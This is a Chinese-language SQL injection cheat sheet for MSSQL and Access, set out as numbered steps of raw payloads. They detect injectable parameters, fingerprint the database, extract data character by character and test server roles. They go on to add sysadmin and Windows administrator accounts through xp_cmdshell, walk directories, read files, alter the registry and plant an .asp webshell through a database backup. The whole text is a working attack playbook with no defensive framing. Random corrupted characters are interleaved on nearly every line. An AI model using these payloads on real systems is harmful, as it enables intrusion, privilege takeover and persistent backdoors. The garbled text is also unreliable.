1.判断是否有注入;and 1=1 ;and 1=2 g<t�r |n�
2.初步判断是否是mssql ;and user>0 sqs�BGFeG�
S�kS
v�u}
3.注入参数是字符'and [查询条件] and ''=' �mgg/�i@�(
tL�LP2^_&
4.搜索时没过滤参数的'and [查询条件] and '%25'=' $�My�%7S/3
���dMYDB�
5.判断数据库系统 �2��x t
8F
rZ
*��}jD[
;and (select count(*) from sysobjects)>0 mssql Z?dz@�d%C�
����(rvK�@
;and (select count(*) from msysobjects)>0 access T���VQ9"C�
<�kp?*xV]]
Hh,��q)(Wo
<K�n�l6$B�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 *ewE�{$UpK
�Y�iB^m���
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 a!�]'S4JS
%�r?Y!��=0
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 e'�p'{]r<w
�gm(`�SC?a
9.(1)猜字段的ascii值(access) H���W)�> `
�,A4v|]kq]
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 up���#W"`"
x}�{/) ?vC
(2)猜字段的ascii值(mssql) �EH=[!iW�;
t*iKkV^aE
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 I�&
��DEF*
sr�LX�woN[
10.测试权限结构(mssql) �[vrM�,?X�
TgoaE�ufS<
Y{ijSOl3��
4�9W@?:��b
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- yb\�T<���*
��s��I�Jl9
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- dG2��k4 O�
Arc�6�d�5Q
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- yS'W �s�s
x-�1RmL_%�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- � �qr~�P�$
J�z��<-B��
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 98��'/�yZ
g��0O�~5.f
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- F>�R�L&�i�
��Q�8.�=�w
;and 1=(select IS_MEMBER('db_owner'));-- �q��!iS��Y
LDc?/
�Z1�
~.7/o�0'+�
)3�1{�.c/�
11.添加mssql和系统的帐户 /N�'0@���q
iI.px��o
s
;exec master.dbo.sp_addlogin username;-- |qm_�ESz�l
;exec master.dbo.sp_password null,username,password;-- =HapC�mrx8
ZRH�K?wg'#
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- &��6���w�D
=�p{55�d�R
;exec master.dbo.xp_cmdshell 'net user username password 79`O�B�##�
1 etl:gcEC
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- +-2o b90_m
:���8�h\�x
;exec master.dbo.xp_cmdshell 'net user username password /add';-- -Y>��,\VEK
v]{F�.�N
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- v�x�E��#�6
`xv2�,Z9�<
UI2TW�)^�2
/o�L�&
<�e
12.(1)遍历目录 pW5ch�"HE�
Z uFk�}R"x
;create table dirs(paths varchar(100), id int) ?��TWve)U
*^��aEUp6&
;insert dirs exec master.dbo.xp_dirtree 'c:\' h�@AKfE!\~
)SU\s+"M�
;and (select top 1 paths from dirs)>0 hQ7-�m.UZw
4*Uzo�mb?q
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) fab.���%�$
w}|XSJ!���
<�$z6:4uN_
%B�}<�5iO�
(2)遍历目录 � m�#K)�%0
�{�&dbxj-'
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- f |%II�,!3
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 qTZ\;[CrP"
`D-P�}hDm!
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 $�Z|�H�FV{
epN��!�+(v
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 Kd� �r7� V
)fy-�]Ky
*
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 lQl�!TW"aO
C]EkVcK�FA
M�}fk[Yr�>
ThvgYv--�B
13.mssql中的存储过程 HOaNhJ{�7D
y`,;m#f�rT
xp_regenumvalues 注册表根键, 子键 �9\'Jt�ZO�
�%?�`O�
.W
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 %g_��)_ ~�
NiH�� =��T
xp_regread 根键,子键,键值名 y'5`Uo?\",
ty8>(�N�(~
;exec xp_regread ��F�MO��O�
38GkV.e}$
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �LD�*X�NcE
�<Hf3AB;#4
xp_regwrite 根键,子键, 值名, 值类型, 值 ^GpL��l���
,&~-�Sq)�~
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 kzk8b?r�OA
�6:�~<L!`&
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 BOOb��{kcg
wz�..�����
xp_regdeletevalue 根键,子键,值名 /a*�8z,��x
?y-�@��c]
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Gf
+>Aj�U'
/X]g�m\x7s
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 CNe(]�HIOH
GorEHl�vVh
H�_ a�##�z
9�7[wz� C,
14.mssql的backup创建webshell ��/�lC,5y�
\gu8� �~zK
use model 2TG2<wqvE
k8\��KCKql
create table cmd(str image); R4X9g\KpAt
4{Q$�^wD+.
insert into cmd(str) values (''); Y�<I��uw�S
1`1j�Sx5}.
backup database model to disk='c:\l.asp'; <FX���]n<�
&zd@cr��1�
� �&��.(iS
�L�8q#�_k�
15.mssql内置函数 C�A1�Jjm�=
2ql)]Skg6
;and (select @@version)>0 获得Windows的版本号 .820�~b��0
qzNX�z_#+u
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �q %j8J��s
^�rs{�1�S
;and (select user_name())>0 爆当前系统的连接用户 �7�Vk9{x$z
�{�sxdD��l
;and (select db_name())>0 得到当前连接的数据库 ,{\Ae�"{6�
$vK,Gugc�x
f[vm��]1�#
fN@�ZJ~F%j
16.简洁的webshell 0i"2s}^+�_
{\`y)k �7�
use model uF|Up]Z� G
AFM+`{C��q
create table cmd(str image); "��uP*p�R^
-[�J4nN�&N
insert into cmd(str) values (''); ��>Tjl?C�S
:ssj7wl :�
backup database model to disk='g:\wwwtest\l.asp';
